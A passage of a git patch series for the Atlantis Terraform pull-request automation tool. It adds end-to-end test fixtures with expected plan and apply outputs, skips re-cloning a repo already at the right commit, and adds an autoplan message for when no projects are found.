+ plan: + steps: + - init + - plan: + extra_args: [-var, var=fromconfig] + staging: + plan: + steps: + - init + - plan: + extra_args: [-var-file, staging.tfvars] + apply: + steps: [apply] diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt new file mode 100644 index 0000000000..4c1f22f7a9 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = fromconfig +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt new file mode 100644 index 0000000000..d467c8c713 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `staging` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = fromfile +workspace = staging + +``` + diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt new file mode 100644 index 0000000000..6611b1b70b --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt @@ -0,0 +1,51 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `.` +1. workspace: `staging` path: `.` + +### 1. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... 
+The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- +### 2. workspace: `staging` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
+--- + diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt new file mode 100644 index 0000000000..0abe4f2f13 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `staging` \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple-yaml/main.tf b/server/testfixtures/test-repos/simple-yaml/main.tf new file mode 100644 index 0000000000..39f891a7b0 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/main.tf @@ -0,0 +1,15 @@ +resource "null_resource" "simple" { + count = "1" +} + +variable "var" { + default = "default" +} + +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple-yaml/staging.tfvars b/server/testfixtures/test-repos/simple-yaml/staging.tfvars new file mode 100644 index 0000000000..6cf6f711e1 --- /dev/null +++ b/server/testfixtures/test-repos/simple-yaml/staging.tfvars @@ -0,0 +1 @@ +var= "fromfile" \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/.gitkeep b/server/testfixtures/test-repos/simple/.gitkeep deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt new file mode 100644 index 0000000000..ef14ca06f5 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! 
Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = default_workspace +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt new file mode 100644 index 0000000000..e17039ffce --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt @@ -0,0 +1,14 @@ +Ran Apply in dir: `.` workspace: `new_workspace` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = new_workspace +workspace = new_workspace + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt index 3c58045de2..8c49494b4a 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt @@ -7,7 +7,8 @@ Apply complete! Resources: 1 added, 0 changed, 0 destroyed. Outputs: -this = overridden +var = overridden +workspace = default ``` diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt index 4d254afae5..6c123ea8f5 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt @@ -7,7 +7,8 @@ Apply complete! Resources: 1 added, 0 changed, 0 destroyed. 
Outputs: -this = default +var = default +workspace = default ``` diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt new file mode 100644 index 0000000000..2aea0c8cb6 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `new_workspace` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
+ diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt similarity index 100% rename from server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt rename to server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt new file mode 100644 index 0000000000..1b856aa5c4 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace` diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf index 028fbb2139..588b3db4df 100644 --- a/server/testfixtures/test-repos/simple/main.tf +++ b/server/testfixtures/test-repos/simple/main.tf @@ -6,6 +6,10 @@ variable "var" { default = "default" } -output "this" { +output "var" { value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" } \ No newline at end of file From e7d5bf54fbb0c565f2f9956d4e39e3e9dcb0490b Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 18 Jun 2018 20:54:58 +0100 Subject: [PATCH 28/69] Implement not deleting repo when same sha --- server/events/atlantis_workspace.go | 31 ++- server/events/command_handler.go | 2 +- server/events/markdown_renderer.go | 8 +- server/events_controller_e2e_test.go | 178 ++++++++++++------ .../test-repos/modules-yaml/atlantis.yaml | 8 + .../exp-output-apply-production.txt | 13 ++ .../modules-yaml/exp-output-apply-staging.txt | 13 ++ .../modules-yaml/exp-output-autoplan.txt | 51 +++++ .../exp-output-merge-all-dirs.txt | 4 + .../exp-output-merge-only-staging.txt | 3 + 
.../modules-yaml/exp-output-merge.txt | 4 + .../exp-output-plan-production.txt | 23 +++ .../modules-yaml/exp-output-plan-staging.txt | 23 +++ .../modules-yaml/modules/null/main.tf | 10 + .../modules-yaml/production/main.tf | 7 + .../test-repos/modules-yaml/staging/main.tf | 7 + .../modules/exp-output-apply-production.txt | 13 ++ .../modules/exp-output-apply-staging.txt | 13 ++ .../exp-output-autoplan-only-modules.txt | 2 + .../exp-output-autoplan-only-staging.txt | 23 +++ .../modules/exp-output-merge-all-dirs.txt | 4 + .../modules/exp-output-merge-only-staging.txt | 3 + .../test-repos/modules/exp-output-merge.txt | 4 + .../modules/exp-output-plan-production.txt | 23 +++ .../modules/exp-output-plan-staging.txt | 23 +++ .../test-repos/modules/modules/null/main.tf | 10 + .../test-repos/modules/production/main.tf | 7 + .../test-repos/modules/staging/main.tf | 7 + .../simple/exp-output-merge-workspaces.txt | 2 +- 29 files changed, 448 insertions(+), 71 deletions(-) create mode 100644 server/testfixtures/test-repos/modules-yaml/atlantis.yaml create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/modules/null/main.tf create mode 100644 server/testfixtures/test-repos/modules-yaml/production/main.tf create mode 100644 
server/testfixtures/test-repos/modules-yaml/staging/main.tf create mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-production.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-production.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-staging.txt create mode 100644 server/testfixtures/test-repos/modules/modules/null/main.tf create mode 100644 server/testfixtures/test-repos/modules/production/main.tf create mode 100644 server/testfixtures/test-repos/modules/staging/main.tf diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index 190b87790d..67112b1ce4 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -18,6 +18,7 @@ import ( "os/exec" "path/filepath" "strconv" + "strings" "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/models" @@ -48,7 +49,9 @@ type FileWorkspace struct { } // Clone git clones headRepo, checks out the branch and then returns the absolute -// path to the root of the cloned repo. +// path to the root of the cloned repo. If the repo already exists and is at +// the right commit it does nothing. This is to support running commands in +// multiple dirs of the same repo without deleting existing plans. 
func (w *FileWorkspace) Clone( log *logging.SimpleLogger, baseRepo models.Repo, @@ -57,11 +60,27 @@ func (w *FileWorkspace) Clone( workspace string) (string, error) { cloneDir := w.cloneDir(baseRepo, p, workspace) - // This is safe to do because we lock runs on repo/pull/workspace so no one else - // is using this workspace. - log.Info("cleaning clone directory %q", cloneDir) - if err := os.RemoveAll(cloneDir); err != nil { - return "", errors.Wrap(err, "deleting old workspace") + // If the directory already exists, check if it's at the right commit. + // If so, then we do nothing. + if _, err := os.Stat(cloneDir); err == nil { + revParseCmd := exec.Command("git", "rev-parse", "HEAD") // #nosec + revParseCmd.Dir = cloneDir + output, err := revParseCmd.CombinedOutput() + if err != nil { + return "", errors.Wrapf(err, "running git rev-parse HEAD: %s", string(output)) + } + currCommit := strings.Trim(string(output), "\n") + if string(currCommit) == p.HeadCommit { + log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit) + return cloneDir, nil + } + log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, string(currCommit)) + + // It's okay to delete all plans now since they're out of date. + log.Info("cleaning clone directory %q", cloneDir) + if err := os.RemoveAll(cloneDir); err != nil { + return "", errors.Wrap(err, "deleting old workspace") + } } // Create the directory and parents if necessary. 
diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 601d3be099..bfd25dd935 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -195,7 +195,7 @@ func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) { if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } - comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose) + comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose, ctx.Command.Autoplan) c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck } diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index 4094c3861c..0f623f04a6 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -58,7 +58,7 @@ type ProjectResultTmplData struct { // Render formats the data into a markdown string. 
// nolint: interfacer -func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string { +func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool, autoplan bool) string { commandStr := strings.Title(cmdName.String()) common := CommonData{commandStr, verbose, log} if res.Error != nil { @@ -67,6 +67,9 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log if res.Failure != "" { return m.renderTemplate(failureWithLogTmpl, FailureData{res.Failure, common}) } + if len(res.ProjectResults) == 0 && autoplan { + return m.renderTemplate(autoplanNoProjectsWithLogTmpl, common) + } return m.renderProjectResults(res.ProjectResults, common) } @@ -145,9 +148,12 @@ var errTmplText = "**{{.Command}} Error**\n" + "```\n" + "{{.Error}}\n" + "```\n" +var autoplanNoProjectsTmplText = "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n" var errTmpl = template.Must(template.New("").Parse(errTmplText)) var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl)) var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n" var failureTmpl = template.Must(template.New("").Parse(failureTmplText)) var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl)) +var autoplanNoProjectsTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText)) +var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl)) var logTmpl = "{{if .Verbose}}\n
Log\n

\n\n```\n{{.Log}}```\n

{{end}}\n" diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index e2bb30ff6e..2cd7183c07 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -6,6 +6,7 @@ import ( "io/ioutil" "net/http" "net/http/httptest" + "os" "os/exec" "path/filepath" "regexp" @@ -58,40 +59,40 @@ func TestGitHubWorkflow(t *testing.T) { ExpMergeCommentFile string CommentAndReplies []string }{ - //{ - // Description: "simple", - // RepoDir: "simple", - // ModifiedFiles: []string{"main.tf"}, - // ExpAutoplanCommentFile: "exp-output-autoplan.txt", - // CommentAndReplies: []string{ - // "atlantis apply", "exp-output-apply.txt", - // }, - // ExpMergeCommentFile: "exp-output-merge.txt", - //}, - //{ - // Description: "simple with comment -var", - // RepoDir: "simple", - // ModifiedFiles: []string{"main.tf"}, - // ExpAutoplanCommentFile: "exp-output-autoplan.txt", - // CommentAndReplies: []string{ - // "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt", - // "atlantis apply", "exp-output-apply-var.txt", - // }, - // ExpMergeCommentFile: "exp-output-merge.txt", - //}, - //{ - // Description: "simple with workspaces", - // RepoDir: "simple", - // ModifiedFiles: []string{"main.tf"}, - // ExpAutoplanCommentFile: "exp-output-autoplan.txt", - // CommentAndReplies: []string{ - // "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt", - // "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt", - // "atlantis apply", "exp-output-apply-var-default-workspace.txt", - // "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt", - // }, - // ExpMergeCommentFile: "exp-output-merge-workspaces.txt", - //}, + { + Description: "simple", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply", "exp-output-apply.txt", + }, + 
ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "simple with comment -var", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt", + "atlantis apply", "exp-output-apply-var.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "simple with workspaces", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt", + "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt", + "atlantis apply", "exp-output-apply-var-default-workspace.txt", + "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt", + }, + ExpMergeCommentFile: "exp-output-merge-workspaces.txt", + }, { Description: "simple with atlantis.yaml", RepoDir: "simple-yaml", @@ -103,18 +104,52 @@ func TestGitHubWorkflow(t *testing.T) { }, ExpMergeCommentFile: "exp-output-merge.txt", }, + { + Description: "modules staging only", + RepoDir: "modules", + ModifiedFiles: []string{"staging/main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan-only-staging.txt", + CommentAndReplies: []string{ + "atlantis apply -d staging", "exp-output-apply-staging.txt", + }, + ExpMergeCommentFile: "exp-output-merge-only-staging.txt", + }, + { + Description: "modules modules only", + RepoDir: "modules", + ModifiedFiles: []string{"modules/null/main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan-only-modules.txt", + CommentAndReplies: []string{ + "atlantis plan -d staging", "exp-output-plan-staging.txt", + "atlantis plan -d production", "exp-output-plan-production.txt", + "atlantis apply -d staging", "exp-output-apply-staging.txt", + "atlantis apply -d production", 
"exp-output-apply-production.txt", + }, + ExpMergeCommentFile: "exp-output-merge-all-dirs.txt", + }, + { + Description: "modules-yaml", + RepoDir: "modules-yaml", + ModifiedFiles: []string{"modules/null/main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply -d staging", "exp-output-apply-staging.txt", + "atlantis apply -d production", "exp-output-apply-production.txt", + }, + ExpMergeCommentFile: "exp-output-merge-all-dirs.txt", + }, } for _, c := range cases { t.Run(c.Description, func(t *testing.T) { ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) // Set the repo to be cloned through the testing backdoor. - repoDir, cleanup := initializeRepo(t, c.RepoDir) + repoDir, headSHA, cleanup := initializeRepo(t, c.RepoDir) defer cleanup() atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir) // Setup test dependencies. w := httptest.NewRecorder() - When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) + When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(headSHA), nil) When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil) // First, send the open pull request event and trigger an autoplan. @@ -122,9 +157,7 @@ func TestGitHubWorkflow(t *testing.T) { ctrl.Post(w, pullOpenedReq) responseContains(t, w, 200, "Processing...") _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - exp, err := ioutil.ReadFile(filepath.Join(repoDir, c.ExpAutoplanCommentFile)) - Ok(t, err) - Equals(t, string(exp), autoplanComment) + assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir) // Now send any other comments. 
for i := 0; i < len(c.CommentAndReplies); i += 2 { @@ -136,16 +169,7 @@ func TestGitHubWorkflow(t *testing.T) { ctrl.Post(w, commentReq) responseContains(t, w, 200, "Processing...") _, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - - exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) - Ok(t, err) - // Replace all 'ID: 1111818181' strings with * so we can do a comparison. - idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) - atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)") - if string(exp) != atlantisComment { - t.Logf("comment: %s", comment) - } - Equals(t, string(exp), atlantisComment) + assertCommentEquals(t, expOutputFile, atlantisComment, c.RepoDir) } // Finally, send the pull request merged event. @@ -155,9 +179,7 @@ func TestGitHubWorkflow(t *testing.T) { responseContains(t, w, 200, "Pull request cleaned successfully") numPrevComments := (len(c.CommentAndReplies) / 2) + 1 _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile)) - Ok(t, err) - Equals(t, string(exp), pullClosedComment) + assertCommentEquals(t, c.ExpMergeCommentFile, pullClosedComment, c.RepoDir) }) } } @@ -166,8 +188,6 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, allowForkPRs := false dataDir, cleanup := TempDir(t) defer cleanup() - testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") - Ok(t, err) // Mocks. 
e2eVCSClient := vcsmocks.NewMockClientProxy() @@ -199,7 +219,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, } atlantisWorkspace := &events.FileWorkspace{ DataDir: dataDir, - TestingOverrideCloneURL: testRepoDir, + TestingOverrideCloneURL: "override-me", } defaultTFVersion := terraformClient.Version() @@ -318,7 +338,11 @@ func GitHubPullRequestClosedEvent(t *testing.T) *http.Request { return req } -func GitHubPullRequestParsed() *github.PullRequest { +func GitHubPullRequestParsed(headSHA string) *github.PullRequest { + // headSHA can't be empty so default if not set. + if headSHA == "" { + headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d" + } return &github.PullRequest{ Number: github.Int(1), State: github.String("open"), @@ -328,7 +352,7 @@ func GitHubPullRequestParsed() *github.PullRequest { FullName: github.String("runatlantis/atlantis-tests"), CloneURL: github.String("/runatlantis/atlantis-tests.git"), }, - SHA: github.String("sha"), + SHA: github.String(headSHA), Ref: github.String("branch"), }, Base: &github.PullRequestBranch{ @@ -343,15 +367,21 @@ func GitHubPullRequestParsed() *github.PullRequest { } } +// absRepoPath returns the absolute path to the test repo under dir repoDir. +func absRepoPath(t *testing.T, repoDir string) string { + path, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir)) + Ok(t, err) + return path +} + // initializeRepo copies the repo data from testfixtures and initializes a new // git repo in a temp directory. It returns that directory and a function // to run in a defer that will delete the dir. // The purpose of this function is to create a real git repository with a branch // called 'branch' from the files under repoDir. This is so we can check in // those files normally without needing a .git directory. 
-func initializeRepo(t *testing.T, repoDir string) (string, func()) { - originRepo, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir)) - Ok(t, err) +func initializeRepo(t *testing.T, repoDir string) (string, string, func()) { + originRepo := absRepoPath(t, repoDir) // Copy the files to the temp dir. destDir, cleanup := TempDir(t) @@ -365,13 +395,37 @@ func initializeRepo(t *testing.T, repoDir string) (string, func()) { runCmd(t, destDir, "git", "checkout", "-b", "branch") runCmd(t, destDir, "git", "add", ".") runCmd(t, destDir, "git", "commit", "-am", "branch commit") + headSHA := runCmd(t, destDir, "git", "rev-parse", "HEAD") + headSHA = strings.Trim(headSHA, "\n") - return destDir, cleanup + return destDir, headSHA, cleanup } -func runCmd(t *testing.T, dir string, name string, args ...string) { +func runCmd(t *testing.T, dir string, name string, args ...string) string { cpCmd := exec.Command(name, args...) cpCmd.Dir = dir cpOut, err := cpCmd.CombinedOutput() Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut) + return string(cpOut) +} + +func assertCommentEquals(t *testing.T, expFile string, act string, repoDir string) { + t.Helper() + exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile)) + Ok(t, err) + + // Replace all 'ID: 1111818181' strings with * so we can do a comparison. 
+ idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) + act = idRegex.ReplaceAllString(act, "(ID: ******************)") + + if string(exp) != act { + actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act") + err := ioutil.WriteFile(actFile, []byte(act), 0600) + Ok(t, err) + cwd, err := os.Getwd() + Ok(t, err) + rel, err := filepath.Rel(cwd, actFile) + Ok(t, err) + t.Errorf("%q was different, wrote actual comment to %q", expFile, rel) + } } diff --git a/server/testfixtures/test-repos/modules-yaml/atlantis.yaml b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml new file mode 100644 index 0000000000..e5915f3911 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml @@ -0,0 +1,8 @@ +version: 2 +projects: +- dir: staging + autoplan: + when_modified: ["**/*.tf", "../modules/null/*"] +- dir: production + autoplan: + when_modified: ["**/*.tf", "../modules/null/*"] diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt new file mode 100644 index 0000000000..81c3ec8bfa --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `production` workspace: `default` +```diff +module.null.null_resource.this: Creating... +module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = production + +``` + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt new file mode 100644 index 0000000000..2ec35e2786 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `staging` workspace: `default` +```diff +module.null.null_resource.this: Creating... 
+module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = staging + +``` + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt new file mode 100644 index 0000000000..f9a2c26ebc --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt @@ -0,0 +1,51 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `staging` +1. workspace: `default` path: `production` + +### 1. workspace: `default` path: `staging` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- +### 2. workspace: `default` path: `production` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
